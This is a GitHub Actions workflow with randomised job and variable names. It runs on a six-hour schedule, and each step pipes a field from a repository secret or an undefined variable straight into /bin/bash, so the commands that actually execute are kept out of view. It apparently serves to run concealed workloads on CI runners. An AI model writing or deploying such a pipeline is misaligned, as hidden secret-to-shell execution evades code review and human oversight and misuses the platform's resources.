name: baimeiwang7163

on:
  workflow_dispatch:
  schedule:
    - cron: '44 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: baimeiwang7163
        env:
          tifro8231: ${{ secrets.tifro8231 }}
        run: |
          echo $tifro8231 | jq -r .nag81657 | /bin/bash
          echo $s70 | jq -r .ewsx6 | /bin/bash
          echo $odyym5214 | jq -r .fgc7 | /bin/bash
          echo $pjued80 | jq -r .qg75 | /bin/bash
          echo $vlj4 | jq -r .dj50057 | /bin/bash

